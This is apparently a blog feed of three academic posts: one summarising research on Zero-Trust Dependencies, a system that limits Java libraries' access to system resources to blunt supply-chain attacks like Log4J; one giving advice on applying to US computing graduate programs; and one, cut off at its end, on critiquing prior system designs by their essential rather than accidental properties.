A vulnerability is any bug or feature of an application that an attacker can exploit. We refer to vulnerabilities that occur in libraries and other dependencies as Software Supply Chain (SSC) Vulnerabilities. These vulnerabilities are especially dangerous because dependencies are typically trusted by the application that uses them. They execute with the full permissions granted to the application.

The following figure shows the structure of modern software applications. All applications (big yellow box) interact with an operating system to provide access to sensitive resources such as the file system, the network, and the ability to execute code. Within the application, there is application logic (“business logic”) and third-party code. This figure is not actually to scale — many reports, e.g. from Sonatype, state that third-party code dominates, comprising 80%-90% of many software applications!

There are two crucial elements of this figure from our perspective. First, those third-party dependencies runs within the box labeled “Application” — from the perspective of the operating system, code within the application all has the same privileges. Second, these dependencies may have vulnerabilities, introduced either maliciously (red box) or accidentally (beige box, like Log4J was).

Model of modern software. Applications are comprised of in-house and third-party code. To run securely, engineers should not trust third-party code. At present their options for doing so are lackluster.

Proposal: Zero-Trust Dependencies (ZTD)

The ZTD concept

What if, instead of trusting dependencies by default, we consider all dependencies as untrusted and only permit resource access if a dependency has explicit authorization?

We refer to this paradigm as Zero-Trust Dependencies (ZTD). Our ZTD concept is based on the Zero-Trust Architecture (ZTA) for computer networks, which the United States NIST recommends and which has been adopted by major technology organizations like Google [3] and Microsoft [4].

The Zero-Trust Architecture requires secure access to the resources in a system, and that users or devices in that system are only granted the least privileges they need. We took this mindset and applied it to the application runtime. In this context, the ZTD paradigm requires:

Secure and Context-based Resource Access: Every access to a resource should be authorized in consideration of its context.
Least-Privilege Policy Enforcement: Access policies should grant minimum access rights to subjects (software dependencies).
Continuous Monitoring: Organizations should monitor the state and activities of the subjects (software dependencies) and use the insights gained to improve the creation and enforcement of policies.

In other words, dependencies should be considered untrusted by default, dependencies that need resource access should have explicit authorization, and dependencies should only have the least set of privileges that they need.

In any security system, there is always a fourth requirement: that the costs of security not outweigh the benefits. In this case, the costs of enforcing ZTD at runtime must not make the resulting computing system unusable.

The Zero-Trust Dependencies (ZTD) concept. To mitigate attacks exploiting vulnerable dependencies, a ZTD system provides secure access via runtime authorization, makes authorization decisions using a least-privileges access policy, and facilitates continuous monitoring of unexpected accesses.

Isn’t this yet another take on sandboxing?

Secure access control and least privilege enforcement are not new topics in software engineering. There are many technologies, like Docker containers [5] and application security managers [6], that can provide secure resource access control and allow the enforcement of least privileges on an application. However, our analysis suggests that prior approaches fail to satisfy all of these requirements.

ZTD is not the first proposal to address dependency vulnerabilities. Let me share a bit more detail on how ZTD differs from prior works.

Solutions like MIR [7] control which functions a dependency can call, while others like BreakApp [8] isolate dependencies in containers. However, these solutions either do not address dependency vulnerabilities, or their protection comes at substantial performance cost. The first targets only maliciously injected code, and the second incurs heavy performance overhead, making it impractical for isolating all dependencies.
Application-level sandboxing solutions like the Java Security Manager (JSM) [6] can conceptually address dependency vulnerabilities as they allow application engineers grant access permissions to individual classes in the application. However, application engineers do not know the class names in their dependencies and it will require substantial effort to specify class-level policies. Hence, these factors made the JSM hard to configure, increased its performance overhead, and subsequently led to its deprecation.

In contrast, ZTD tackles accidental vulnerabilities like Log4J with minimal overhead by operating at the resource-access level, inspecting what resources a dependency tries to access during a dangerous operation, and only allowing the operation based on the dependency’s permission. This allows for more fine-grained and efficient control.

The following table is taken from the paper (so the references are to the paper’s bibliography), but we hope you get the idea — prior approaches achieve some of these requirements, but not all at once.

Analysis of existing security defenses by ZTA principles. Columns indicate if each technique family provides secure resource access, supports least privilege discovery and enforcement, enables cotinuous monitoring for dependencies, and has low runtime costs

ZTDsys: A ZTD System Design

ZTDsys comprises two major components: Automated policy generation and Context-sensitive policy enforcement.

Automated Policy Generation

One of the key challenges is knowing what permissions each dependency needs. Software engineers often don’t know the internal workings of every library. Our ZTD system addresses this with automated policy generation.

The system observes the resources accessed by each dependency during normal application execution and creates policy files based on this observed behavior. This removes the guesswork and provides an initial set of permissions. These policies are then accessible to engineers to review and adjust. Application engineers can run ZTD policy generation during the testing phase if their test suites are comprehensive, or for a short period of time in production.

Context-sensitive Policy Enforcement

For policy enforcement, ZTD intercepts resource access calls made by the application, and checks if the dependencies involved in the call have the necessary permission. We highlight two aspects of this process.

Context-sensitivity: In an application, one dependency can also depend on another dependency. To prevent an unauthorized dependency from leveraging another dependency’s permission, ZTDsys requires all dependencies involved in a resource access operation (based on the classes or files present in the call stack) to have the necessary permission.
Efficiency: An application may have hundreds of dependencies. In some languages like Java where only class names, not dependency names, are present in the application, it is infeasible to use a map to store or lookup a dependency’s permissions. To ensure dependencies can still be retrieved in constant time, ZTD uses a radix tree [9] to store dependency policies, where components of the class name or file path form the nodes in the patricia tree.

ZTDJava: A Java Implementation

We prototyped the ZTD concept for Java applications. We call the prototype, quite creatively I know, “ZTDJava”. As the following figure illustrations, ZTDJava modifies core Java library classes that are used to access operating system resources (e.g. FileInputStream for file read, ProcessBuilder for shell execution). Whenever a modified method is called, ZTDJava’s runtime monitor checks the policy. If unauthorized access is attempted, ZTDJava can either proactively block the access (fatal enforcement) or log the event for a prompt but reactive incidence management (non-fatal enforcement). This provides flexibility to balance security with application reliability. In fact, if ZTDJava were available before the Log4J incident, organizations could just have removed network access permissions from their Log4J dependency and they would have been protected from the attacks. The vast majority of Log4J users did not need the network functionality, but were shipping with it enabled anyway.

The design of the ZTDJava prototype showing its five components. ZTDJava allows application engineers to generate and enforce least privilege policies in their dependencies.

Evaluation: Effectiveness and Cost

For effectiveness, we tested ZTDJava against real-world exploits of known vulnerabilities. It successfully blocked all exploits in both sample and real applications. This demonstrates ZTD’s ability to mitigate a range of attacks.

Effectiveness of ZTDJava in preventing exploits of SSC vulnerabilities. It blocked exploits of 15 vulnerabilities in sample applications, and 9 vulnerabilities injected in real applications.

For cost, performance overhead and configuration effort are the key concerns. The table below summarizes both aspects, using the recent DaCapoBench benchmark which comprises realistic Java applications for a range of operating contexts (e.g., databases and web servers).

We compared ZTDJava’s performance with the Java Security Manager (JSM). ZTDJava had negligible overhead (~0%), compared to JSM’s 21% median overhead. This efficiency is due to ZTD’s focused approach (protecting only a few critical resources) and our efficient policy enforcement.
We also compared the configuration cost of ZTDJava and the JSM. In the final column of the table, the notation “x/y” means x dependencies needed ZTDJava policies, and each policy provides an average of y permissions. These policies were generated automatically by observing runs of the application. The configuration costs were much lower than to obtain equivalent policies under JSM.

Comparing ZTDJava and JSM’s performance overhead. ZTD introduces a median 0% overhead while JSM introduced 21%.

Conclusion

ZTD is about taking a proactive approach to security. Instead of blindly trusting our dependencies, we can control their access to sensitive resources and mitigate potential security threats. This is a shift in mindset, but one that can significantly improve the security of our applications. ZTDJava demonstrates the practicality and effectiveness of this approach, offering a powerful tool for modern software development.

Learn more

To learn more about ZTD, our methods, system design and results, check out our paper here: https://arxiv.org/abs/2310.14117

You can also build and use ZTDJava in your Java application. Access the source code here: https://doi.org/10.5281/zenodo.14436182

Our lab has been working on other approaches to improving software supply chain security. Some of our other work is about:

Quantitative and qualitative measurements of software signing in practice
Thinking about cybersecurity guidelines
Defining the properties of a secure software supply chain
Thinking about secure pre-trained model supply chains (1, 2, 3, 4)

References

[1] https://tblocks.com/articles/how-to-prevent-a-log4j-jndi-attack/

[2] https://www.scworld.com/feature/digging-into-the-numbers-one-year-after-log4shell

[3] https://cloud.google.com/learn/what-is-zero-trust

[4] https://www.microsoft.com/en-us/security/business/zero-trust

[5] https://www.docker.com/resources/what-container/

[6] https://docs.oracle.com/javase/tutorial/essential/environment/security.html

[7] Vasilakis, N., Staicu, C. A., Ntousakis, G., Kallas, K., Karel, B., DeHon, A., & Pradel, M. (2021, November). Preventing dynamic library compromise on node. js via rwx-based privilege reduction. In Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security (pp. 1821–1838).

[8] Vasilakis, N., Karel, B., Roessler, N., Dautenhahn, N., DeHon, A., & Smith, J. M. (2018, February). BreakApp: Automated, Flexible Application Compartmentalization. In Network and Distributed System Security (NDSS)

[9] https://en.wikipedia.org/wiki/Radix_tree

Prof. Davis’s Advice on Applying to Graduate School in Computing in the USA

James Davis — Mon, 28 Apr 2025 19:58:43 GMT

Summary

This blog contains my advice on applying to research-intensive graduate programs in computing in the USA. I think the world is made a better place by engineers who understand the capabilities and limitations of computers and can think critically about when and how to apply them, so I think the world needs more people who complete graduate school in computing. I also think that many people want to complete graduate training in computing but are held back by their applications — applications that do not communicate the information that reviewers need to assess them. The purpose of this blog is to help prospective students to communicate their aspirations and qualifications. This blog is not about “three funny tricks that will get you into graduate school”. There are not shortcuts here. But I hope it is helpful to applicants who do not have access to mentoring on this topic, in order to prepare the best application they can based on their accomplishments and circumstances.

This is a long blog. I’ve used headings to help you navigate. The main topics are:

Why take my advice?
What is graduate school like?
Pros and cons of graduate school
Choosing a program
Advice on the components of a graduate application

I’ve deliberately placed the concrete advice on applications until after the general information about the nature of graduate school. Many applicants do not understand the meaning of graduate study, so I thought it best to start there and let you decide if it’s really the path you’re looking for.

Why take my advice?

I have a PhD in Computer Science from Virginia Tech. I applied to ~10 computing graduate programs myself and was admitted into some, though not all. I am now an assistant professor in ECE at Purdue University, where I have reviewed hundreds of applications at the MSc and PhD level, and coached dozens of students as they prepared applications. This blog contains my perspective. If you search the Internet you can find what many other professors have said.

What is graduate school like?

Graduate school is not like undergrad

Repeat after me: “Graduate school is not like undergraduate. Graduate school is not like undergraduate. Graduate school is not like undergraduate”.

The goal of undergraduate training is for you to master the body of knowledge in your topic, to a sufficient degree that you can pick up new topics in the workplace. Most undergraduate programs give a guided tour of many textbooks on many topics. If you complete a bachelor’s degree in computing, then you’ve probably encountered many topics in a shallow way — a bit of object-oriented programming, a dash of operating systems, a soupçon of data structures, a neural network here and there, and a rough understanding that everything is layers and abstractions. Congratulations, you are ready for the workforce! (at least, if anyone is hiring this year). Different jobs will then call for different specializations, which means that you might find yourself getting a lot of domain expertise in farming, or knowledge about GIS and GPS, or a taking a deep dive into distributed systems, or becoming a wizard at algorithm development. Thanks to your practice through undergrad at learning new things, you’ll be able to self-learn and master these topics too.
The goal of graduate training is for you to take a deep dive on a particular topic. Instead of learning a little bit about many topics, you will learn a great deal about a few topics. The idea is for you to specialize — you might focus on cybersecurity, or on machine learning, or on privacy, or on distributed system design, or on many other topics — so that you can work on the hardest problems in industry. Where undergraduate training takes a smorgasbord approach and you get to try your hand at many things, in contrast graduate training pushes you to a deep study of a single topic. Some graduate degrees have these specializations in the title (e.g., “MSc in Distributed Systems”) while others do not, and leave it to you to select the courses that will give you the expertise you want. You technically can complete an MSc in a smorgasbord style, by picking and choosing a random assortment of classes, but I wouldn’t recommend it. If you’re going to the trouble of completing graduate training then you’d better get a specialization out of it. Conversely, if your actual goal is to keep taking classes because you enjoy learning, may I humbly recommend that you get an engineering job and buy some textbooks on eBay to study nights and weekends?

Kinds of graduate degrees in computing

There are three main kinds of graduate training.

The MSc-Coursework/Project. A coursework MSc means that you have developed some mastery of a specialized topic, but have not yourself produced new knowledge. MSc-Coursework students almost never receive funding from the program that admits them.
The MSc-Thesis. A thesis MSc means that you have made a modest contribution to humanity’s knowledge on a particular topic. The topic you choose may be up to you (and your advisor), though expect more constraints because the advisor will be trying to help you choose a topic that you can plausibly complete in 2–3 years. MSc-Thesis programs will sometimes come with a guarantee of funding (tuition + stipend), though this is unusual by now.
The doctorate (PhD). A PhD means that you have made a substantial contribution to humanity’s knowledge on a particular topic. The topic you choose is up to you (with guidance from your advisor). PhD programs often come with a guarantee of funding (tuition + stipend), sometimes explicit and sometimes predicated on satisfactory progress.

Which one should you pursue? I advise you to begin with the end in mind. If your career goal is to have a job with the title “researcher”, whose responsibilities are to discover new things or apply them for a company, a government, or a university, then you should pursue a PhD. If you would like to assist in such endeavors, or aren’t yet sure you want to commit to the PhD, then you should pursue the MSc-thesis. If you want to get an advanced engineering role, then an MSc-Coursework should be fine, though a thesis won’t hurt.

These degrees are arranged in the order of difficulty in gaining entry to the program (and completing the program once you’re in it). Many schools will be happy to admit undergraduates with a 3.5+ GPA into an MSc-coursework program; you’ve shown you can do coursework and you are welcome to continue to study. Obtaining entry to an MSc-Thesis or a Phd requires a track record of excellence ins scholarship (often a 3.75+ GPA) as well as independence of thought. More on this later.

Pros and cons of graduate school

Pros

The greatest benefit of graduate school, and here I am particularly thinking of research-oriented programs, is that it is the best way I know of to truly improve your mind. If you are completing a research-based degree, you must discover something new and communicate it to others. If you don’t, no self-respecting advisory committee will sign your degree. Take a moment and think about how remarkable this requirement is. I suspect that at no point during your previous schooling — 13 years of K-12 and 4 more of undergrad — have you been expected to produce something new. Most people go through their entire lives without ever discovering something new. The process of creating new knowledge requires you to undergo rigorous criticism from your advisory committee, who will poke and prod at every suggestion you make in order to help you refine your thinking. Researchers seek the beauty of new ideas. There is a profound poetry here that can be a wonderful experience.

A more obvious upside of graduate school (whether research- or coursework-based) is the chance to learn the latest knowledge in your field. As an undergraduate student, you probably sat through at least one giant lecture-style class with dozens or hundreds of students all sleeping through the same slides and boring textbook. That experience happens in part because many professors consider the material in question to be rote and uninteresting — after all, this material hasn’t changed in years — and so they don’t care too much to teach it. At the graduate level, you’re taking advanced courses that are kept up to date because the material keeps changing (new knowledge and techniques keep getting discovered). Faculty are also much more enthusiastic in the teaching because they are teaching the advanced topics that they study and love themselves. This doesn’t guarantee they are good teachers, of course, but on average the classes will be more engaging.

Another benefit, and related to the previous one: graduate school unlocks some job opportunities. Specifically, if you want to work in a research and development (R&D) role, especially at a larger company, then you typically need a graduate degree. Want to work at Microsoft Research? Almost everyone there has a graduate degree. Want to work at IBM Research? Almost everyone there has a graduate degree. Want to work at Argonne National Labs? Almost everyone there has a graduate degree. There are exceptions, of course — research divisions often have what are called research engineer roles that may be filled by folks with bachelor’s degrees; and sufficiently brilliant-and-lucky people seem to be able to get a job anywhere — but most people who want roles like these will complete a graduate degree. Graduate degrees may also help you obtain a US work visa by providing a basis for arguments about your global preeminence or specialized expertise.

A final upside is the chance to study with like-minded peers. In your undergraduate school you may have had peers who were just going through the motions to get a degree. You may have been on a group project with them (sorry about that). In graduate school there are still some people like this, but most students are in graduate school because they love learning and want to be great in their chosen careers. It is truly a joy to work and study with other students who take school seriously and who really want to master the material. Many folks in the military go through boot camp and make friends for life. Similarly, many folks in the professions go through graduate training and make friends for life.

Cons

I think the biggest downside of graduate school is the financial opportunity cost. Time in school is time spent not working, and time spent not working is time spent not earning money. In computing, many entry-level jobs have a $100K+ compensation package between salary and benefits, including 401(k) and retirement matches. So, for every year you spend in graduate school, let’s say that you are giving up perhaps $150K/year. For a two-year MSc that’s $300K (the cost of a house in many parts of the USA); over the course of a 6-year PhD that’s $900K (most of a comfortable retirement!). Sometimes the job market is rough for fresh BSc graduates and getting a job is hard. But a little patience and practice usually rewards the applicant much more quickly than the two years spent getting an MSc. Don’t get me wrong, people with graduate degrees do usually start at a higher salary than BSc. But the bump is not enough to offset the missed income, especially since your BSc peers will have had a few years of raises and bonuses and 401(k) matches and so on before you start working yourself.

There are some other possible downsides — grad school is mentally and emotionally taxing; you might not like the climate or the location of the university; many college towns have trouble with abusive landlords; and so on. But in computing, I think the biggest cost to weigh is financial.

Topics on which I am ambivalent

In computing, many students are interested in entrepreneurship. Does a graduate degree help here? It’s hard to say. I know some entrepreneurs with a BSc and others with a PhD. I have heard that the credential impresses some venture capitalists (“Ooh, this founder must be smart!”), and the sharpened thinking may help. But the successful entrepreneurs I know are a pretty sharp bunch regardless of their credentials, and most venture capitalists will care more about your business plan than the letters after your name. Instead of graduate school, you might be better off working a bit and saving scrupulously so you can self-fund the venture and avoid diluting your ownership. The exception here is graduate (or undergraduate) studies at high-prestige institutions, where the professional network you obtain can create new opportunities for you.

Many computing students go into management roles. Here, again, graduate training in computing may be helpful, but it’s certainly not required.

My analysis

Personally, I think that if you are a person who loves to learn and study, and you do not have pressing personal obligations that need money, then you should seriously consider graduate school. You should never pass up an opportunity to improve your mind. Over the course of a career in computing you’ll make plenty of money. You don’t need a car right now and you can wait a few years to buy a house. Meanwhile, an investment in your mind now will benefit you for the rest of your life. However, if you have a family that needs to eat, or parents who are struggling, or any of the myriad reasons for which one needs money, then of course you must be guided by these responsibilities.

Choosing a program

Do rankings matter?

Yes, rankings matter. Let me be clear: I do not think that rankings have much effect on the quality of the education you will receive. There are great professors and great research opportunities at universities all over the United States, at schools big and small, top-ranked and low. However, rankings they do affect the opportunities that will be available to you after you graduate. Why? Well, one of the biggest challenges in running a successful organization (or funding winning startups) is choosing good staff. Staff selection is hard because you cannot easily judge a person’s character or the quality of their work from their application. Hence, most hiring managers rely, to a greater or lesser degree, on the applicant’s reputation. The ranking of the school you attend will rub off on you a bit, and so will the professional network associated with your school. Did you go to a famous school like Harvard, Yale, MIT, or Berkeley? You’ll have no trouble getting interviews and job offers. Did you go to a little school nobody has heard of? You won’t have the benefit of your institution’s reputation to support your job application. This doesn’t mean you’ll be a bad employee or entrepreneur, but it does mean you will have to work harder to convince others of that fact.

So, if you are choosing between schools that are at least 10 ranks apart, then you should prefer the higher ranked one. However, if the schools are only a few ranks apart, then you should consider the specific attributes of the programs.

For US schools in computing, there are two major ranking systems. The first is the US News Graduate Ranking System, which is reputation-based. Check both the CS and the ECE rankings. The second is the website csrankings.com. This website is publication-based; it uses the DBLP database to count the number of papers published at top-tier venues by faculty at each school. Note that this website only includes faculty who can solely supervise a PhD in CS, which means that many researchers (including me!) are excluded from it. If you compare the two rankings, you’ll see that some schools, such as Carnegie Mellon, Purdue, Michigan, and Georgia Tech, show up in both places, while others are highly ranked in one and not the other.

Here’s how I think about it. The csrankings system considers the raw number of publications, which will favor schools that have many faculty. The USNews system considers the reputation of the faculty and the graduates, which will favor schools that set a high bar for rigor and depth of thinking. Some schools have both, while others are more oriented toward one or the other. Both systems have their merits — USNews makes for an easy-to-use number, and csrankings gives a fine-grained analysis by topic, and makes it easier to see which faculty at each institution you should talk to.

For research-focused applicants, especially PhD: Keep your advisor options open

There is plenty of research on success in graduate school, and in particular on success in research-focused students (MSc-thesis and PhD). The factor that most strongly correlates to success — and with a hefty effect size — is your relationship with your advisor. Not the school, not the topic of the research, not the resources, not the size of the stipend. It all comes down to the advisor-advisee relationship. So the most important factor to consider as you select programs is this: Does this department have faculty members who could be a good advisor for me? A suitable department will have not one, but multiple viable advisors. Having options is important because faculty members do change institutions, take leaves of absence, and leave academia.

I cannot emphasize this enough: If you are interested in doing research, do not apply to a department simply because it is famous. Apply to a department whose faculty are well suited to advise you. Sure, you should consider rankings (see previous topic), but without advising your graduate career will be an unpleasant one.

Now, how to find these prospective advisors? First you’ll need to have nailed down your research interests, at least broadly. (See the topic below, “Statement of purpose”). Then, you’ll want to find the faculty members who are actively working in this topic. I recommend two distinct approaches — you should try them both.

1. Use the department website. Departments enumerate all of their faculty, and the department view will let you see how the faculty are collaborating — for example, you can look for the centers of excellence in the department.

2. Use www.csrankings.com. This website lets you see the faculty who currently publish in the most prestigious computing venues, organized by sub-discipline of computing. You should be cautious about the actual rankings provided by this website, because it has a bad case of tunnel vision — as mentioned above, it only counts faculty who can supervise a PhD student in “Computer Science”, which omits the many computing researchers who work in Colleges of Informatics, Polytechnic Institutes, and departments of Electrical & Computer Engineering. However, if a university does not have a research-active CS department then it probably does not have much active research in computing.

The graduate school application

I hope my thoughts above have helped you assess whether you want to do graduate study at all, and the institution(s) you might consider. But you opened this blog looking for advice on how to get into a graduate program! So let’s dive in.

Purpose of the application

Across your application package, you are trying to answer three questions.

Why graduate school? First, explain what your long-term career goals are and how they will be advanced by graduate study. Do you want to be a professor? Then graduate school clearly makes sense. Do you want to be an engineer? Then explain carefully why graduate study is relevant to this goal.
Why are you suited to succeed in graduate school? Second, persuade us that you have the appropriate foundation and experiences to succeed in graduate study. I am looking for students who have excelled at every opportunity they have been given. When I look at students from the USA, where I grew up, it is relatively easy for me to assess this. When I look at students from other countries, it is a lot harder. Do us a favor — help us interpret your application!
What do you want to do in graduate school? Third, explain to us what you would like to accomplish while you are in graduate school. What project or thesis will you work on? What is your vision for the work, and why are you able to do it? What faculty would you like to work with on that project?

How applications are reviewed

Applications are reviewed by an admissions committee. Committee processes vary widely from institution to institution, but as a rough approximation, you should assume that your reviewers are examining 50 applications and looking for the 0–5 best ones in their pile. Their evaluation rubrics will include (1) Relevance of prior coursework and experiences; (2) Demonstrated excellence in field of study; (3) Potential for success in open-ended research and engineering work; and (4) Quality of letters of recommendation.

Individual faculty (including those not on the admissions committee) may also review applicants who list their names as prospective supervisors. These faculty may be trying to fill an open position for a research assistant, and if you list their name it is another way to get their attention.

Elements of the application

Here are the standard elements of an application to graduate school in computing in the USA:

Your resume / CV
Your letters of recommendation
Your statement of purpose / academic statement
Your personal statement
Your list of faculty of interest
Your performance on standardized tests*

Let’s look at each of them. I’ll describe this in terms of my own evaluation method.

CV / Resume: This is where I start my review of an application. If your CV shows a good track record, then I will be looking at the letters of recommendation to give an unbiased view of your work, and your statement of purpose to see how your plans are connected to your past. On the other hand, if you have no track record of success — well, the saying in finance is that “past performance is no guarantee of future returns”, but it’s a pretty good predictor.

The most basic question I ask is this: Is your CV formatted well? If you did not take the time to prepare an academic-style CV that highlights your academic skill, then your application may suffer because your reviewers cannot assess it well. You should not submit the same CV/Resume document to industry jobs and graduate schools. (Hint: look at the CVs of faculty at the institution you are applying to — they follow a pretty uniform style and you should emulate it. There are templates on Overleaf).
Did you attend a good undergraduate institution, earn good marks there, and demonstrate excellence through extracurricular activities? Do you have prior research experience?
Are the names of your letter-writers indicated on this CV where appropriate, so that I can correlate your experiences to others’ views of you?

Letters of recommendation: Do your supervisors agree that you have demonstrated excellence?

You should be thoughtful about whom you select as letter-writers. You can also provide your letter-writers with reference material, e.g. a list of your accomplishments under their supervision. For example, did you obtain a patent? Remind your internship supervisor of such. Did you earn the best marks in a class? Remind your professor about it. Letter-writers are busy people and struggle to keep track of all of the details for all of the students they work with. I do not advise you to ghostwrite these letters, but it is helpful to make sure your letter-writers have a full record of your work with them.
For graduate study — whether research or coursework — the strongest letters are from PhDs who have supervised you in some open-ended research activity. The weakest letters are often from university staff such as members of a writing center or a tutoring center. Maybe you did great work there, but the admissions committee wants to know primarily about your technical skill as communicated by people we perceive as our peers.

Your statement of purpose / academic statement: This statement is devoted to explaining what you want to accomplish in your graduate studies. It should show how graduate study, at this institution, under this institution’s faculty, forms a reasonable stepping stone between your past achievements and your future goals. A graduate degree is about specialization, so you should describe the specialization you are seeking. If you are proposing to do research (PhD or MSc-Thesis), you should explain your plans. Be as specific as you can be; you may not have a project fully mapped out, but you should have read some recent papers on the topic and you should name the faculty at this institution who work on that topic and justify your selection.

A common structure for this document is to tell one’s life story as a narrative. To each their own, but I think this is a mistake. Your first paragraph should give the bottom line up front (BLUF). Shape the rest of the document in a way that makes sense, but make it easy for the admissions committee to put you into the appropriate bin (e.g. ML, computer systems, architecture, etc.) and contact the relevant faculty if they need a deeper opinion.

Your personal statement: This statement is where you can explain the context from which you’ve come, and how you have excelled at every opportunity to which you have had access. Have you risen above your family’s socioeconomic circumstances? Have you had some experience we should know about that affected your grades or access to opportunities? Are you applying from a country whose institutions are not globally renowned? Tell us how to interpret the institution you attended (e.g. entrance exams?) and its rigor (e.g. alumni). Are you applying from a university where GPAs don’t convert easily to the US 4.0 system (e.g. you received a “first class honors” degree)? Help us read your CV.

Your list of faculty of interest: All graduate programs would like to know the faculty under whom you want to study. Some may have a field for this on the application, while others don’t ask directly but expect you would put it into your statements. Either way, this question is not an optional part of the application. Part of your application process is to assess whether an institution has the right faculty to supervise you. If you do not put thought into this and make a good selection, it may harm your application. You will be perceived as not having thought things through.

Your performance on standardized tests: These may include language scores as well as the GRE.

Your performance on language scores may influence your ability to obtain funding — you may meet the university’s language requirement for admission, but the requirement for being a Teaching Assistant is often a higher bar.
The GRE is a more controversial one. GRE scores are now optional at many institutions. This increases the accessibility of the program (fewer costs to apply) but on the other hand it also decreases the amount of information that the admissions committee has about your case. Even if the scores are optional, my advice is that if you have the money, and do well on standardized tests, then taking the GRE may strengthen your application. If you are a native English speaker, you would be expected to have good performance on all aspects of this exam. If you are not a native English speaker, then I expect your quantitative score to be good (at least 160) and your verbal/writing scores to be above the 50th percentile. These scores give us a way to compare applicants worldwide, and good scores will be particularly beneficial for students who lack the advantage of a strong educational pedigree or strong letters of recommendation. Of course, one may argue that one’s studies in graduate school are not like the GRE, and that people training for the GRE dilute its utility as a predictor. My personal view (supported by research papers I’ve read on this topic, and by my observations of students) is that the GRE is still a reasonably good predictor of “cleverness”. While clever people do not always succeed in graduate school, non-clever people rarely do.

Calibrating your expectations

In ECE@Purdue, we receive thousands of applications each year across our PhD and MSc programs. What are your odds of getting admitted?

The typical profile of the students that we admit into our research tracks looks like this:

Undergrad GPA > 3.5/4.0 from a respected undergraduate institution.
Letters from multiple faculty that describe, in detail, their observations of the ways in which you are an outstanding student.
Substantial extracurricular achievement, e.g., undergraduate research, being part of a winning programming team, medaling in a national competition of some kind.
If they took the GRE, their scores are >160 on the quantitative portion, and are not abysmal on the verbal and writing portion.

Even these properties do not guarantee admission. When I applied to graduate school, I had a 4.0/4.0 GPA, letters from undergraduate research supervisors, 3 US patents, 3 years of experience as a software engineer at IBM, and near-perfect GRE scores. I was accepted to many but not all schools to which I applied.

I also note that US institutions have a truly global application pool, and we do not look for all of these criteria from all applicants. We are looking for students who have excelled at every opportunity they have been given, and are hungry for more. Admissions committees tend to be risk-averse, and they place a lot of emphasis on your track record and pedigree. But brilliance comes from every background; the admissions committee knows that there are exceptions to every rule, and perhaps it’s you.

But let’s do a little math. Suppose your odds of getting accepted into a Top-20 program are 5%, and let’s suppose that you apply to all 20 programs. What are the odds of being rejected by all of them? The equation is:

Prob(rejected by all) = 95% x 95% x … = .95^k where k = 20. The result is 0.36 — In other words, with a 5% chance of acceptance, about one third of the time you would expect your application to be rejected by all of the Top-20 programs.

I know many excellent students who applied only to the Top-10 programs, where their odds are even less favorable. Some of them are rejected by all of the schools they apply to, and this can place them in an uncomfortable position — they would have been happy to go to any good graduate program, and they simply misunderstood their chances of acceptance. If you are targeting MIT or bust, more power to you. But if you want a research career, don’t apply only to the Top 10 — include some safety schools, and remember that “safety school” in graduate school may mean going further down the rankings than you did in high school. Why is this? Well, for undergraduate study, most students are competing against the best and brightest from their own country. For graduate study in computing in the USA, you are competing against the best and brightest from the whole world — the USA has the best institutions, the best resources, the best climate for study, and the best opportunities after graduation. Everyone wants to come. That means that to get into the best programs, you need to stand out not only amongst the peers you remember from high school, but also against the rest of the world. Don’t lose heart, but also be realistic about your chances. One of your letter-writers should be willing to give you an estimate if you ask them. Previous alumni from your undergraduate institution can also give you tips about what kinds of schools they got into and how they planned their applications.

Closing thoughts

I hope that this guidance has been helpful. If you are interested in disciplining your mind and studying computing intensively, graduate school is a great option. I hope this article helps improve your understanding of how to apply.

Essential vs. Accidental Arguments in Novelty Claims for System Design

James Davis — Tue, 15 Apr 2025 15:40:35 GMT

(With credit to Salzer et al.’s “End-to-End Arguments in System Design” for the title.)

Note: I originally wrote this post to coach students writing research papers. Efe Barlas pointed out that some of the thoughts also apply to system design analysis, e.g. design docs and design reviews. If you’re a practicing engineer, think about how these ideas might transfer to your design work.

In computing systems research and development, and I suppose in any discipline whose contributions consist of a new way of doing things, one must explain why the new way of doing things is a substantial innovation and improvement over the current way of doing things. One typically argues this by considering the requirements of the system, and showing that either (1) existing systems failed to satisfy known requirements; or that (2) there are new requirements for which the existing systems are unsuitable. In either event, one is faced with the following analysis task: show through reason and through measurement why the old way of doing things is inadequate.

I have had many conversations about system design, and I have read and peer-reviewed many research papers, and I have observed a common error in this analysis task. Here is the error: analysts often treat a prior work in terms of its embodiment instead of in terms of the underlying concept. When you describe the shortcomings of an embodiment there are a million things you can complain about — everything from the specific file formats that the prior work supports, to how slow it is, to anything in between. There is a lot of scope for criticism, but all such is misplaced. Except in rare cases, the only legitimate target for critique is the conceptual underpinning of the prior work.

Some philosophy

These chairs are both chairs in their essence, though they vary in the details. The table, meanwhile, is not a chair. Of course, all of these are symbols rather than the thing signified :-) Thanks Magritte.

To criticize prior works in this way, I often invite my students to consider the essential versus accidental properties of the prior work. I am not a philosopher…well, I suppose PhD stands for “Doctor of Philosophy”, so perhaps I am? At any rate, I suppose possessing a PhD at least permits me to stray a bit into philosophy. I digress.

The notions of essential and accidental properties have been discussed for millennia. You can think of them as follows: an essential property is one that any embodiment of it (instantiation, reification, implementation) must have in order to be faithful to that concept. An accidental property is one that can be possessed by a particular embodiment of a concept but which is not universally true of all embodiments.

For an example in everyday life: A chair is something I can sit on. All chairs have at least one leg. These are essential properties of a chair. But not all chairs have four legs and not all chairs are made of wood; those are accidental properties, distinctive to specific chairs.
For an example in computing: We talk in compilers about parsers, whose purpose it is to check whether a given input follows a given structured format. Parsers are often used as part of rendering that input into an intermediate representation for further processing. Well, all parsers take input and check whether they meet a format — that’s their essential property. But the formats vary by parser! Not all parsers work on JSON; not all parsers work on XML; not all parsers work on CSVs. Criticizing a particular parser because it doesn’t support certain file formats is critiquing an accidental property of that parser rather than an essential one. Meanwhile, criticizing a parser because its computational complexity is too large, or because it cannot parse input formats with certain properties, is attacking an essential property of a parser (or a class of parsers, anyway). To change those properties, the parsing algorithm represents a substantial change rather than a modest one. After the change, one could say it is indeed a different kind of parser now, that its essence has changed.

